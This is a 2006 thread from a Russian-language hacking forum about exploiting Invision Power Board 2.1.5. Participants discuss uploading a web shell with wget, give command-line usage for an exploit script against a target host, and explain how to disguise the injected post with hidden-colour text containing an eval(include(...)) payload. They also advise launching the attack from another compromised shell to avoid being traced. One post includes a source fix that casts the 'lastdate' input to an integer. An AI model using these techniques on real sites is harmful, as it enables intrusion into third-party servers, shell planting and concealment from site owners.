Форумы Уязвимость Invision Power Board 2.1.5

Discussion in 'Уязвимости CMS/форумов' started by Go0o$E, 26 Apr 2006.

Thread Status:
Not open for further replies.
  1. karapuz

    karapuz New Member

    Joined:
    6 Mar 2005
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0
    вот теперь другая трабла, как шелл залить?

    wget http://www.шелл/shell.php -P /cache/

    не помогло, показывается html код какойто...
    права записи на папки есть
     
  2. tester

    tester New Member

    Joined:
    18 Jul 2005
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Search Message ...[ FAILED ] - chto za poisk soob4enija? ktonibut razbiralsja?
     
    #42 tester, 29 Apr 2006
    Last edited: 29 Apr 2006
  3. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    tester - читай внимательно эту тему! тут все уже сказали
     
  4. dasNICK

    dasNICK New Member

    Joined:
    28 Feb 2006
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    wget не пашет.. Кто залил шелл ?
     
  5. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    Есть еще и другие качалки GET CURL и тд.
     
  6. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Ребят, прекращаем оффтопить. Комманды типа wget, это уже не по сабжу. Смотрим в соответствующем разделе.
     
  7. Dark Ne0

    Dark Ne0 New Member

    Joined:
    29 Apr 2006
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Полное руководство по применению сплоя :)))
    Способ применения:
    Регимся на сайте
    C://ex.pl -h www.host.ru -d forum -l Dark Ne0 -p pass -f 2 -v 2.1.*
    -d Указываем директорию где находится форум
    -l ваш логин
    -p ваш пасс
    -f номер форума где экс может создать тему
    -v версия форума
    Способ защиты:
    Заходим sources/search.php(sources/action_public/search.php
    Было

    {
    $this->output = preg_replace( "#(value=[\"']{$ibforums->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );
    }

    Заменить на

    {
    $ibforums->input['lastdate'] = intval($ibforums->input['lastdate']);
    $this->output = preg_replace( "#(value=[\"']{$ibforums->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );
    }

    Патча пока нет :)))
    Терь уверен все вопросы отпадут
     
  8. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    Да и помним, что запуская не чищеный сплойт ты отдаешь этот шелл в руки РСТ.
     
  9. Dark Ne0

    Dark Ne0 New Member

    Joined:
    29 Apr 2006
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Но все равно отследить взломщика по запросу не составит труда !!!
    Так что лучше с начала подумать что ломать
     
    1 person likes this.
  10. Lord Nikon

    Lord Nikon Banned

    Joined:
    12 Sep 2005
    Messages:
    224
    Likes Received:
    15
    Reputations:
    -3
    я так и не понял как убрать шифровку,помогите.
    Спасибо!
     
  11. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    370
    Likes Received:
    166
    Reputations:
    45
    Хых,мой пост на рст,что не узнали:)Des =Desr0w )))
    Видео с использованием данного сплойта:http://forum.antichat.ru/thread18337.html
     
  12. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
    сплойт интересный но пользоваться им в чистом виде не стоит.во первых он инклудит файл с сайта рст и светится у них в логах во вторых он оставляет слишком "паливный" пост.
    Если уж кто пользуется им в исходном виде то хотябы сделайте это находим -
    $post = "st=0&act=Post
    изменяем переменные &TopicTitle=MY_COOL_TOPICK&TopicDesc=MY_COOL_DESC
    нахлдим строку
    $text = 'r57ipbxp...
    дописываем в начале чото типа
    $text ='MY_COOL_POST [color=#EFEFEF} r57ipbxplhohohoeval(include(chr(10.........)); //[/color}';
    это создаст иллюзиб поста и замаскирует код цвет подбирать под форум (скобки в конце заменить на нормальные)
    запускать это дело естественно лучше с какогонить шела а не со своего компа..
     
  13. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    370
    Likes Received:
    166
    Reputations:
    45
    Grrl,
    хех,инклудится чтобы можно было команды передавать через get;)
     
  14. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
    правда? хм а я думала это для тогочтобы вампиров отпугивать спасибо что просвятил..
     
    1 person likes this.
  15. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    370
    Likes Received:
    166
    Reputations:
    45
    + на поднятие настроение поставил:)
     
  16. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    370
    Likes Received:
    166
    Reputations:
    45
    Обоснуй plzz
     
  17. gimlis

    gimlis New Member

    Joined:
    25 Jan 2006
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Без сплойта больше функциональности.
     
  18. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Имеется ввиду ситуация как со сплойтом для пхпбб 2.0.19 на исполнение команд, когда сплойт отсылал логин, пасс админа и урл форума на родной сайт РСТ....
     
    _________________________
  19. Desr0w

    Desr0w Banned

    Joined:
    1 Feb 2006
    Messages:
    370
    Likes Received:
    166
    Reputations:
    45
    +toxa+,ну мля х3.Я не думаю что этим парням это нужно
     
  20. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    _________________________
Thread Status:
Not open for further replies.